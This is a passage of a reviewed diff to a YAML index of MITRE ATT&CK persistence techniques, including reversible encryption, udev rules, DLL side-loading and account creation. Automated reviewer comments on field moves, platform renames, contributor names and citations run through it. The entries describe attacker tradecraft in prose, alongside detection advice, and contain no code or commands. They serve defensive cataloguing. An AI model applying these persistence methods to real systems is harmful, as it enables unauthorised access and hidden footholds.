+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
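Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005 because `type`, `id`, `created`, `created_by_ref` and `external_references` moved from the top of each technique to the bottom, so T1556.005's old header shows as removed while T1556.001's shows as added. The substantive changes are small and hard to see in the noise: `x_mitre_permissions_required: [Administrator]` is dropped from T1556.001, `revoked: false` and `x_mitre_platforms: [Windows]` are added, the version moves 2.0 to 2.1 with attack spec 3.2.0, and T1556.005's `modified` advances to 2024-08-26. A stable key order in the generator would keep the two objects from overlapping in future diffs; until then, the PR description should list the field drop explicitly.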
@@ -35144,6 +35506,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -35154,23 +35517,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35187,7 +35577,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
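Review bot: the contributor entry flips to surname-first (`Rodchenko Aleksandr`) while, later in this same diff, `Goldstein Menachem` is corrected to given-name-first (`Menachem Goldstein`); the two changes pull in opposite directions, and every other contributor line shown here (e.g. `Brandon Dalton @PartyD0lphin`) is given-name-first. If upstream ATT&CK carries the name this way, keep it but say so in the commit message; otherwise use one convention.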
@@ -35246,7 +35636,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -35328,7 +35717,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35443,12 +35831,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35471,16 +35858,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
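Review bot: T1136's platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with the consolidated `Office Suite` and `Identity Provider` names (version 2.4 to 2.5), and the same substitution is applied to T1098.002, T1137.002 and T1078.004 below. Anything keyed on the old platform strings, such as per-platform index outputs or dashboards filtered on `Google Workspace`, will return nothing for these techniques after this sync, so the rename deserves a line in the PR description and a check that whatever generates per-platform outputs knows the two new names.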
@@ -35507,7 +35893,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35576,7 +35961,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35612,7 +35996,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35631,12 +36015,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35686,12 +36069,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35724,9 +36106,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
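Review bot: splitting the combined contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two is an improvement, but the split keeps the `(Gurucul)` affiliation only on Nilesh Dherange and moves both entries to the end of the list. If both contributors are with Gurucul, the affiliation should be carried on both lines; if the ordering and attribution come verbatim from upstream, a note to that effect in the PR avoids the question.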
@@ -35743,9 +36126,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35791,12 +36173,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35810,7 +36191,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35869,7 +36250,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35895,7 +36275,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35921,13 +36301,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35951,8 +36329,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35982,7 +36360,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -36025,7 +36402,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36050,12 +36427,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36095,8 +36471,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -36104,13 +36482,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -36141,17 +36519,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
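Review bot: the at.allow/at.deny paragraph at the end of this hunk renders as unprefixed fragments broken at each `at.allow` / `at.deny` token; since this `description` is a `|-` block scalar, any real line breaks inside it become part of the technique text, so confirm the actual file keeps that paragraph on one line. The new sentence on `Win32_ScheduledJob` cites `Malicious Life by Cybereason`, which is only defined in the references hunk further down; both must land together or the citation dangles.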
@@ -36214,7 +36589,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -36248,8 +36623,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
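Review bot: rewriting the twitter.com link to x.com and bumping "Retrieved" to September 12, 2024 for a 2017 tweet loses the original capture without gaining durability; the subt0x10 reference later in this file uses a web.archive.org snapshot, and the same treatment would suit this one.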
@@ -36258,6 +36633,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
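Review bot: the new Cybereason reference URL carries a `#blog-subscribe` fragment, which is a newsletter-widget anchor rather than part of the article; drop it so the link is `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The author is also written as `Philip Tsukerman.` while the neighbouring entry uses `Russinovich, M.`; `Tsukerman, P.` keeps the citation style consistent.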
@@ -36270,12 +36649,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
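Review bot: `spec_version: '2.1'` is deleted here for T1053.002 and the same deletion repeats for every entry below, with only `x_mitre_attack_spec_version` left in place. Say so in the PR description, because anything that reads the STIX `spec_version` field from this index will now get nothing.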
@@ -36288,6 +36666,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -36324,17 +36703,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
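Review bot: the platform list for T1556 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, so any per-platform index derived from this file under the old names will need regenerating rather than patching. Grep the file for the three old names before merging to make sure the rename is complete and not just applied to this entry.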
@@ -36380,9 +36759,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
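Review bot: the new T1546.017 block ends with `atomic_tests: []` but no `identifier: T1546.017`, whereas T1053.002 and T1546.007 in this same file carry an `identifier:` line; pick one convention for all entries. Within the block, `x_mitre_detection` names three rule directories while the description lists five (`/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/` are absent from detection), leaves `/usr/lib/udev/rules.d/` unbackticked, and has a trailing space before the closing quote; if this is a verbatim upstream pull, leave it, otherwise tidy the string.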
@@ -36419,7 +36854,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
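Review bot: `modified` for T1546.007 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:09:17.363Z`, and the same regression appears below for T1556.004, T1574.004, T1574.012 and T1205.002. Every old value shares the `14:00:00.188Z` time, which suggests those were generated placeholders rather than upstream timestamps; a line in the PR description would stop readers treating this as a rollback.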
@@ -36443,51 +36878,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
